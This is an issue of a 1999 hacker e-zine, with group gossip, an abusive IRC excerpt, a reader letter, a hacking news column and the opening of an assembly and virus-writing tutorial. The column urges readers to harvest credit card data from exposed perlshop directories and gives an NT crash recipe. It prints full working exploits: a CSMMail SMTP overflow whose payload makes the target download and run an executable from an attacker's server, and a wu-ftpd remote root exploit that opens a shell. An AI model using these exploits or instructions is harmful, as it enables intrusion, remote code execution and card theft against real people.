[f41th Issue 5 June 1999]  [c] D4RKCYDE 1999
[darkcyde.system7.org]  [#darkcyde EFNET]

'f41th, chOice of the real phreak'    'f41th - Die Wahl des wahren Phreak'
'find us on the PSTN bitch'           'Zu finden auf dem PSTN bitch'

--> Index ]----oooo-------------------------------oooo----[ f41th 5! ]------

-->]OO[::::[ Editorial                 ]:::::::[OO--[ hybrid    ]---
-->]OO[::::[ Letters to f41th          ]:::::::[OO--[ you       ]---
-->]OO[::::[ SUIDcyde                  ]:::::::[OO--[ bodie     ]---
-->]OO[::::[ Assembly coding and virii ]:::::::[OO--[ bodie     ]---
-->]OO[::::[ SS7 network components    ]:::::::[OO--[ digiphreq ]---
-->]OO[::::[ Electronic data           ]:::::::[OO--[ zomba     ]---
-->]OO[::::[ Linux system security     ]:::::::[OO--[ zomba     ]---
-->]OO[::::[ Zombas bonus phone warez  ]:::::::[OO--[ zomba     ]---
-->]OO[::::[ Scan of O8OO 252          ]:::::::[OO--[ shadow    ]---
-->]OO[::::[ IRC logz                  ]:::::::[OO--[ #darkcyde ]---
-->]OO[::::[ Wireless E-911 Service    ]:::::::[OO--[ digiphreq ]---
-->]OO[::::[ Introduction to carding   ]:::::::[OO--[ Kryptus   ]---
-->]OO[::::[ Political views           ]:::::::[OO--[ nino      ]---
-->]OO[::::[ Outness                   ]:::::::[PP--[ hybrid    ]---

[ random quotes from tonekilla - he wonders why he's not in    ]
[ darkcyde anymore - a) lame b) idle c) pisses me off on irc.  ]

its like:

| suck hybrid's cock for ops | <-- yEp
motherfuckers stop <-- nope
NINO IS MY FUCKING BRO <-- heh?
dont tell me to relax <-- why?
i dont give a fuck <-- we know
well FUCK YOU <-- ok
FUCK YOU <-- OK
FUCK YOU HYBRID <-- no
what the fuck is your problem? you didnt get banned for no fucking reason from a channel you properly ran for 3 months then someone comes in, kicks and bans you and fucking turns it into a dynasty
*** DTMFslut sets mode: +b *!*tonekilla@*.tecinfo.com
*** tonekilla was kicked by DTMFslut (banned: learn some manners bitch) <---- well said

----[ shoutz    [ special shouts to kryptis (we'll miss ya bro)    ]----------
----------------[ simmeth digitalfokus mobsters bosplaya osiris    ]----------
----------------[ * WERD WERD WERD WERD WERD WERD WERD WERD WERD   ]----------
----------------[ shadowx ch1ckie subz gr1p ph1x tip gb shylock    ]----------
----------------[ prez_ jasun xio psyclone knight oclet nino dave  ]----------
----------------[ b4b0 9x phunc deadsoul aktive sonicborg asshair  ]----------

----[ memberz
----------------[ hybrid downtime force zomba bodie digiphreq elf  ]----------
----------------[ mortis alphagod lowtek | new member: shadowx     ]----------
                                         | new member: postalphreak
                                         | new member: nino

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Editorial ]:::::::[OO--[ by hybrid ]------[ hybrid@phunc.com ]--
-->[OO]:::::::::::::::::::::::::::::[ http://www.phunc.com/~hybrid ]:::::::::

Hi there, yep, we made it to another issue, this time it's even better :> We got bodie's new column [SUIDCYDE] and even more leet info. It's now spring, so we've decided to do a spring clean of darkcyde.. for starters all the idle people, ie: tonekilla, have been kicked out, and we've decided to improve the quality of the zine, cutting down on the codez, and increasing the info. I'm not writing anything for this issue 'cause I've done enough already, I'm the one who has to put all this stuff together, and keep it all organised, etc.

I'd like to say one thing to the dudes in #darkcyde efnet, that are bitching about shit.. It's irc, nothing more. HEH, take a look at the logs our bot (DTMFslut) recorded of the channel - at the end of this issue.
Welp, there's my leeto editorial done, now I gotta stick this stuff into 14-inch screen format, doesn't ms-dos edit 0wn? -cya on irc #darkcyde.

hybrid
http://www.phunc.com/~hybrid <---- my site, check it out.

-->]OO[::::[ Mail ]:::::::[OO--[ you ]---------------------------------------

you have new mail
#pine

From bennygill@gmx.net Sun May 9 22:30:52 1999
Date: Sun, 9 May 1999 22:15:04 +0100
From: Ben J. Gill
To: hybrid@phunc.com
Subject: f41th ISSUE IIII

Hiya,

Don't want to be a smart ass, but I just read f41th ISSUE IIII and noticed that you translated the heading into German. I happen to be a German Phreak living in the UK (London) at the moment and couldn't help but notice that the transl. isn't quite what it should be. Here's my Version:

'f41th, chOice of the real phreak'    'f41th - Die Wahl des wahren Phreak'
'find us on the PSTN bitch'           'Zu finden auf dem PSTN bitch'

I dunno what a PSTN bitch is, but "bitch" is not a "Weibchen" in German, bitch = "Nutte, Hure"

Hope I wasn't too much of a smart ass, but I just couldn't help it ;o)

Ben

http://bennygill.home.pages.de
ICQ : 10302953
mail : Phrenetic@gmx.net ( H/P mails )
       bennygill@gmx.net ( Personal mails )
       funkymonkey@geek.com ( Tech / News Mails )

---------[ Thanks for the interest in our/my bad German skillz.
---------[ HEH, look I spelt it correctly this time... :)
---------[ #screen -r

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SUIDcyde ]:::::::[OO--[ by Bodie ]----------[ bodi3@usa.net ]---
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Welcome to the new regular hacking section in faith, this section is devoted to the latest news, techniques and exploits in hacking. Enjoy

----------

Bugtraq watch

As a regular column now in faith I'll be telling everyone what is going on in the world's greatest mailing list - bugtraq, it's where all the latest exploits get posted to and it's the best list for security.
Recently there have been several bugs reported. Possibly the most severe one was a report of being able to remotely reboot an NT machine. This is how to do it:

find an NT box running SP4 (service pack 4)
Telnet to port 1723
type 256 'h' characters and hit return
Press ^D

This hopefully should cause the machine to completely reboot and cause microshaft a few more headaches which is always good news for our favorite linux servers :). This bug hasn't been confirmed yet and some people haven't been able to get it to work, but give it a go anyway

Possibly the most serious flaw uncovered recently was an exploit in some online shopping services, some of these are run on a software package called perlshop. With this you can get peoples credit card info which is always nice :) For this one all you have to do is find a site running the software (it may tell you that it is on the web page) and go to the directory:

www.vulnerable.com/store/customers/

or it may be in:

www.vulnerable.com/store/temp_customers/

This bug is likely to be fixed extremely quickly so if ya wanna exploit it, ya better hurry up :)

There have also been buffer overflows reported in the windows CSMMail SMTP server. Time for some exploit code:

<--------------------------CUT HERE------------------------->
#define UNIX #ifndef UNIX #include #include #include #include #define CLOSE _close #define SLEEP Sleep #else #include #include #include #include #include #include #include #define CLOSE close #define SLEEP sleep #endif /* CSMMail Exploit by _mcp_ Win32 port and sp3 address's by Acpizer Greets go out to the following people: Morpheus, Sizban, Rocket, Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite and #win32asm. You can contact me by e-mail or on efnet. 
As always no greets go out to etl */ const unsigned long FIXUP1 = 264; const unsigned long FIXUP2 = 268; const unsigned long OFFSET = 260; char code[] = "\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB" "\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46" "\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3" "\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66" "\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33" "\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51" "\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6" "\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF" "\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57" "\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1" "\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66" "\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D" "\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46" "\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F" "\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66" "\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53" "\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30" "\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } #ifndef UNIX memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length); #else bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); #endif return(binip); } int usages(char *fname) { printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ .\n"); 
printf("Win32 porting and nt sp3 address's by Acpizer \n"); printf("Usages: \n"); printf("%s \n", fname); printf("win98 SP1:\n"); printf(" = 0xBFF78030\n"); printf(" = 0xBFF79243\n"); printf("NT SP3:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E53FC7\n"); printf("NT SP4:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E9A3A4\n"); printf("Will make running CSMMail download, save, and\n"); printf("execute http:///~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,targethost,sinlen; struct sockaddr_in sin; static unsigned char buffer[20000]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long rw_mem; #ifndef UNIX WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if (err != 0) exit(1); #endif if (argc < 5) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0) { printf("Input Error, the fixup memory address has incorrect format\n"); exit(0); } if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0) { printf("Input error, the return address has incorrect format\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"VRFY "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr2=ptr; ptr2+=FIXUP1; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr2=ptr; ptr2+=FIXUP2; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr+=OFFSET; memcpy ((void *) ptr,(void *)&ret_addr, 4); ptr+=60; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; 
(*ptr2)+= len + ( sizeof(dir) - 1 ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, sizeof(dir) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); #ifndef UNIX send(sock, "HELO lamer.com\r\n",16, 0); send(sock, (char *)&buffer, strlen((char *)&buffer), 0); send(sock,"\r\n",2,0); #else write(sock, "HELO lamer.com\r\n",16); write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char*)&buffer */ write(sock,"\r\n",2); #endif SLEEP(1); printf("Sent the egg\n"); #ifndef UNIX WSACleanup(); #endif CLOSE(sock); exit(1); }
<--------------------------CUT HERE------------------------->

Also there has been another buffer overflow found in wu-ftpd, a popular ftp daemon for unix servers. This only exists in beta versions 12 - 18, and these aren't the current version, so don't be surprised if you find that not too many servers are running it.

<--------------------------CUT HERE------------------------->
/* * Remote/local exploit for wu-ftpd [12] through [18] * gcc w00f.c -o w00f -Wall -O2 * * Offsets/padding may need to be changed, depending on remote daemon * compilation options. Try offsets -5000 to 5000 in increments of 100. * * Note: you need to use -t >0 for -any- version lower than 18. * Coded by smiler and cossack */ #include #include #include #include #include #include #include #include #include #include #include /* In a beta[12-17] shellcode_A overflow, we will not see responses to our commands. Add option -c (use chroot code) to fix this. 
*/ unsigned char hellcode_a[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20" "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c" "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd" "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff" "\x0f\x42\x49\x4e\x0f\x53\x48"; unsigned char hellcode_b[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80" "\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46" "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e" "\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31" "\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03" "\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89" "\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d" "\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80" "\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31" "\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a"; char *Fgets(char *s,int size,FILE *stream); int ftp_command(char *buf,int success,FILE *out,char *fmt,...); int double_up(unsigned long blah,char *doh); int resolv(char *hostname,struct in_addr *addr); void fatal(char *string); int usage(char *program); int tcp_connect(struct in_addr host,unsigned short port); int parse_pwd(char *in,int *pwdlen); void RunShell(int thesock); struct type { unsigned long ret_address; unsigned char align; /* Use this only to offset \xff's used */ signed short pad_shift; /* how little/much padding */ unsigned char overflow_type; /* whether you have to DELE */ char *name; }; /* ret_pos is the same for all types of overflows, you only have to change the padding. This makes it neater, and gives the shellcode plenty of room for nops etc */ #define RET_POS 190 #define FTPROOT "/home/ftp" /* the redhat 5.0 exploit doesn't work at the moment...it must be some trite error i am overlooking. 
(the shellcode exits w/ code 0375) */ struct type types[]={ { 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", }, { 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", }, { 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", }, { 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", }, { 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", }, { 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", }, { 0,0,0,0,NULL } }; struct options { char start_dir[20]; unsigned char *shellcode; unsigned char chroot; char username[10]; char password[10]; int offset; int t; } opts; /* Bit of a big messy function, but hey, its only an exploit */ int main(int argc,char **argv) { char *argv0,ltr; char outbuf[1024], inbuf[1024], ret_string[5]; int pwdlen,ctr,d; FILE *cin; int fd; struct in_addr victim; argv0 = strdup(argv[0]); *opts.username = *opts.password = *opts.start_dir = 0; opts.chroot = opts.offset = opts.t = 0; opts.shellcode = hellcode_a; while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){ switch (d) { case 'c': opts.shellcode = hellcode_b; opts.chroot = 1; break; case 's': strcpy(opts.start_dir,optarg); break; case 'o': opts.offset = atoi(optarg); break; case 't': opts.t = atoi(optarg); if ((opts.t < 0)||(opts.t>5)) { printf("Dont have that type!\n"); exit(-1); } } } argc -= optind; argv += optind; if (argc < 3) usage(argv0); if (!resolv(argv[0],&victim)) { perror("resolving"); exit(-1); } strcpy(opts.username,argv[1]); strcpy(opts.password,argv[2]); if ((fd = tcp_connect(victim,21)) < 0) { perror("connect"); exit(-1); } if (!(cin = fdopen(fd,"r"))) { printf("Couldn't get stream\n"); exit(-1); } Fgets(inbuf,sizeof(inbuf),cin); printf("%s",inbuf); if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0) fatal("Bad username\n"); if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0) fatal("Bad password\n"); if (*opts.start_dir) if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0) fatal("Couldn't change dir\n"); if (ftp_command(inbuf,257,cin,"PWD\n")<0) fatal("PWD\n"); if 
(parse_pwd(inbuf,&pwdlen) < 0) fatal("PWD\n"); srand(time(NULL)); printf("Making padding directorys\n"); for (ctr = 0;ctr < 4;ctr++) { ltr = rand()%26 + 65; memset(outbuf,ltr,194); outbuf[194]=0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); } /* Make padding directory */ ctr = 124 - (pwdlen - types[opts.t].align);//180 //ctr = 152 - (pwdlen - types[opts.t].align); ctr -= types[opts.t].pad_shift; if (ctr < 0) { exit(-1); } memset(outbuf,'A',ctr+1); outbuf[ctr] = 0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); memset(outbuf,0x90,195); d=0; for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++) outbuf[ctr] = opts.shellcode[d++]; double_up(types[opts.t].ret_address-opts.offset,ret_string); strcpy(outbuf+RET_POS,ret_string); strcpy(outbuf+RET_POS+strlen(ret_string),ret_string); printf("Press any key to send shellcode...\n"); getchar(); if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (types[opts.t].overflow_type == 1) if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0) fatal("DELE\n"); /* HEH. For type 1 style we add a dele command. This overflow occurs in delete() in ftpd.c. The cause is realpath() in realpath.c not checking bounds correctly, overwriting path[] in delete(). 
*/ RunShell(fd); return(1); } void RunShell(int thesock) { int n; char recvbuf[1024]; fd_set rset; while (1) { FD_ZERO(&rset); FD_SET(thesock,&rset); FD_SET(STDIN_FILENO,&rset); select(thesock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(thesock,&rset)) { n=read(thesock,recvbuf,1024); if (n <= 0) { printf("Connection closed\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { n=read(STDIN_FILENO,recvbuf,1024); if (n>0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } return; } int double_up(unsigned long blah, char *doh) { int a; unsigned char *ptr,*ptr2; bzero(doh,6); ptr=doh; ptr2=(char *)&blah; for (a=0;a<4;a++) { *ptr++=*ptr2; if (*ptr2==0xff) *ptr++=0xff; ptr2++; } return(1); } int parse_pwd(char *in, int *pwdlen) { char *ptr1,*ptr2; /* 257 "/" is current directory */ ptr1 = strchr(in,'\"'); if (!ptr1) return(-1); ptr2 = strchr(ptr1+1,'\"'); if (!ptr2) return(-1); *ptr2 = 0; *pwdlen = strlen(ptr1+1); /* If its just "/" then it contributes nothing to the RET_POS */ if (*pwdlen==1) *pwdlen -= 1; printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen); return(1); } int tcp_connect(struct in_addr host,unsigned short port) { struct sockaddr_in serv; int fd; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&host,sizeof(struct in_addr)); serv.sin_port = htons(port); serv.sin_family = AF_INET; if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) { return(-1); } return(fd); } int ftp_command(char *buf,int success,FILE *out,char *fmt,...) 
{ va_list va; char line[1200]; int val; va_start(va,fmt); vsprintf(line,fmt,va); va_end(va); if (write(fileno(out),line,strlen(line)) < 0) return(-1); bzero(buf,200); while(1) { Fgets(line,sizeof(line),out); #ifdef DEBUG printf("%s",line); #endif if (*(line+3)!='-') break; } strncpy(buf,line,200); val = atoi(line); if (success != val) return(-1); return(1); } void fatal(char *string) { printf("%s",string); exit(-1); } char *Fgets(char *s,int size,FILE *stream) { char *ptr; ptr = fgets(s,size,stream); //if (!ptr) //fatal("Disconnected\n"); return(ptr); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); } int usage(char *program) { fprintf(stderr,"Usage: %s [-c] [-s start_dir]\n",program); fprintf(stderr,"\t[-o offset] [-t type]\n"); fprintf(stderr,"types:\n"); fprintf(stderr,"0 - %s\n", types[0].name); fprintf(stderr,"1 - %s\n", types[1].name); fprintf(stderr,"2 - %s\n", types[2].name); fprintf(stderr,"3 - %s\n", types[3].name); fprintf(stderr,"4 - %s\n", types[4].name); fprintf(stderr,"5 - %s\n", types[5].name); fprintf(stderr,"\n"); exit(0); }
<--------------------------CUT HERE------------------------->

That's about all for the moment. If you want to subscribe to bugtraq yourself, send a mail to bugtraq@netspace.org with the text

subscribe bugtraq

in the body of the message

Bodie

----------

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Assembly language programming and virii ]::::[OO--[ by Bodie ]--
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Part 1

A lot of people think that writing virii is a hard thing to do, the truth is, it's relatively easy, but it does take a bit of assembly language knowledge.
In this file I will show ya a little assembly programming and how to make a simple virus (so all you script kiddies out there can also create something like melissa - the kewlest piece of programming on the face of the planet :))

But learning assembly language doesn't have to be a completely impossible task, although it probably is a little harder than learning your average C clone. To understand this you will need a basic knowledge of binary numbers. This isn't hard really.

One person once said to me, "languages are like druggies, the higher they are, the easier they are to get on with, but the less use they are to you :)"

Assembly language is more than that though, it gets to the centre of the hacker mentality, it allows you to screw with the exact working of the computer. Some say you can't be a hacker unless you know assembly language, I disagree, but hacking is about making a computer do something it isn't supposed to do, and how can ya do that unless you know exactly how things are working inside the computer?

BASICS

Assembly language programming is different depending on which processor you have, but I know the intel chips best, so I will write this for those chips, for other chips the instructions may be totally different.

REGISTERS

To learn Assembly language you need a basic understanding of the design of the chip that you're writing for. An intel chip is made up of things called registers. These are places in a chip where a number can be stored and manipulated. There are four types of registers: general purpose registers, index registers, segment registers and stack registers.

The first type is the general purpose registers. There are 4 general purpose registers, EAX, EBX, ECX and EDX. These are 32-bit registers. These registers can be split up into smaller 16-bit registers called AX, BX, CX and DX, and these can be further split into 8-bit registers called [A-D]H and [A-D]L. They are arranged mainly like this.

 <-------------E[A-D]X------------>
  _________________________________
 |        |        |               |
 | [A-D]L | [A-D]H |               |
 |________|________|_______________|
 <-----[A-D]X----->

The next type of register is called a Stack Register. There are 2 stack registers, called BP and SP, and as you might have guessed, these are used mainly on the stack. SP is the stack pointer, it tells you where the next item on the stack is placed, but more on that later.

Index Registers are used to hold data on the current program running. IP is the most important of these, as it tells the computer where the next instruction to be executed is located. You can't directly manipulate it (that means you can't put a number directly into it - although there are other ways of having fun with it :)) Other index registers are EDI (Destination index) and ESI (source index). Again these can be split into SI and DI, but unlike general purpose registers, they can't be split any further.

Segment and offset registers are responsible for accessing memory locations. This is a system that has been left over for compatibility with older 16-bit chips, because in a 16-bit register, you could only access 32K memory locations, the chip designers devised a way to use 2 registers to access a memory location, this allows you to access enough memory for almost anyone. The segment is the lower half of the location and it can be held in any segment register. These are CS, DS, ES, SS, FS and GS. The offset can be held in any general purpose register.

THE STACK

Another place to store data is on the stack. Like the name suggests, this is just an area where the data is piled when you need to clear a register for something else, but still need the data to be retrieved later. The stack works on a 'last in, first out' (LIFO) principle. This means that the last item of data to be put on to the stack is the first to come off when you take data from the stack.
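The register layout and the LIFO rule described so far, modelled in C as an added example (not part of the original article; the names reg32, stack16, push16 and pop16 are made up for this sketch). It goes slightly beyond the text by showing SP moving down on each push, a swap of two registers through the stack, and a bounds check on push and pop, which a real CPU does not perform.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added illustration: every name in this file is hypothetical. */

/* A general purpose register. AX, AH and AL are views of the same 32 bits,
 * so they are derived with masks and shifts instead of separate storage. */
typedef struct { uint32_t e; } reg32;

static uint16_t reg_x(const reg32 *r) { return (uint16_t)(r->e & 0xFFFFu); }
static uint8_t  reg_h(const reg32 *r) { return (uint8_t)((r->e >> 8) & 0xFFu); }
static uint8_t  reg_l(const reg32 *r) { return (uint8_t)(r->e & 0xFFu); }
static void set_x(reg32 *r, uint16_t v) { r->e = (r->e & 0xFFFF0000u) | v; }
static void set_h(reg32 *r, uint8_t v)  { r->e = (r->e & 0xFFFF00FFu) | ((uint32_t)v << 8); }
static void set_l(reg32 *r, uint8_t v)  { r->e = (r->e & 0xFFFFFF00u) | v; }

/* Writing AL and AH changes AX and EAX; the upper 16 bits stay untouched. */
uint32_t alias_demo(void)
{
    reg32 eax = { 0x12345678u };
    set_l(&eax, 0xFF);          /* mov al, 0FFh -> EAX = 123456FFh */
    set_h(&eax, 0x00);          /* mov ah, 0    -> EAX = 123400FFh */
    return eax.e;
}

#define STACK_BYTES 16          /* constructed size: room for eight 16-bit words */

typedef struct {
    uint8_t  mem[STACK_BYTES];
    uint16_t sp;                /* offset of the last item pushed */
} stack16;

static void stack_init(stack16 *s)
{
    memset(s->mem, 0, sizeof s->mem);
    s->sp = STACK_BYTES;        /* empty: SP sits just above the highest location */
}

/* PUSH: move SP down two bytes, then store the word. Returns -1 when full. */
static int push16(stack16 *s, uint16_t v)
{
    if (s->sp < 2) return -1;
    s->sp -= 2;
    s->mem[s->sp]     = (uint8_t)(v & 0xFF);
    s->mem[s->sp + 1] = (uint8_t)(v >> 8);
    return 0;
}

/* POP: read the word SP points at, then move SP back up. Returns -1 when empty. */
static int pop16(stack16 *s, uint16_t *out)
{
    if (s->sp > STACK_BYTES - 2) return -1;
    *out = (uint16_t)(s->mem[s->sp] | (s->mem[s->sp + 1] << 8));
    s->sp += 2;
    return 0;
}

/* Push AX, push BX, pop into AX, pop into BX: last in, first out swaps them.
 * Returns the result packed as AX in the high half and BX in the low half. */
uint32_t swap_demo(uint16_t ax_in, uint16_t bx_in)
{
    reg32 a = { 0 }, b = { 0 };
    stack16 st;
    uint16_t tmp = 0;
    stack_init(&st);
    set_x(&a, ax_in);
    set_x(&b, bx_in);
    push16(&st, reg_x(&a));
    push16(&st, reg_x(&b));
    pop16(&st, &tmp); set_x(&a, tmp);
    pop16(&st, &tmp); set_x(&b, tmp);
    return ((uint32_t)reg_x(&a) << 16) | reg_x(&b);
}

/* Try to push more words than fit; count how many were accepted. */
int pushes_accepted(int attempts)
{
    stack16 st;
    int ok = 0;
    stack_init(&st);
    for (int i = 0; i < attempts; i++)
        if (push16(&st, (uint16_t)i) == 0) ok++;
    return ok;
}

/* Popping an empty stack is refused instead of reading past the stack area. */
int pop_empty_refused(void)
{
    stack16 st;
    uint16_t v = 0;
    stack_init(&st);
    return pop16(&st, &v) == -1;
}

int main(void)
{
    reg32 eax = { alias_demo() };
    printf("EAX=%08X AX=%04X AH=%02X AL=%02X\n",
           (unsigned)eax.e, (unsigned)reg_x(&eax), (unsigned)reg_h(&eax), (unsigned)reg_l(&eax));
    printf("swap(1111h, 2222h) -> %08X\n", (unsigned)swap_demo(0x1111, 0x2222));
    printf("pushes accepted: %d of 10\n", pushes_accepted(10));
    printf("pop on empty refused: %d\n", pop_empty_refused());
    return 0;
}
```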
When you put an item of data on to the stack it goes on the highest memory location available in the stack, and then the stack pointer (SP) is set to point to the last item put onto the stack. This is so that the computer knows where the last item is located. The stack is arranged like this.

  ___________
 |           |
 |           |
 | data (1)  |
 |___________|
 |           |
 |           |
 | data (2)  |
 |___________| <--------Stack Pointer (SP)
 |           |
 |           |
 |           |
 |   Free    |
 |   Space   |
 |           |
 |           |
 |___________| <--------Stack Segment (SS)

In this example, data 2 would be the first to be returned when a process is accessing the stack, this is because data 2 was the last item to be put on the stack. If another item was to be put on the stack it would be put into the free space area and the stack pointer would be moved to represent this. This would then be the first item to be returned.

VARIABLES

Variables are easily defined in assembly language, just like any other language. The way to do it is

[variable_name] [type] [value]

a common usage of this would be:

hello db "hello!!!$" ; sets a variable of type db to "hello"

All strings in assembly language have to be terminated with a $ symbol. The variable type we are using is db, this is the common type for strings like this. There are other variable types, I will tell you these later.

SOME INSTRUCTIONS

The structure of an assembly language program is very different from the structure of a program in a higher level language. It consists of a series of 1 line instructions. Some instructions are:

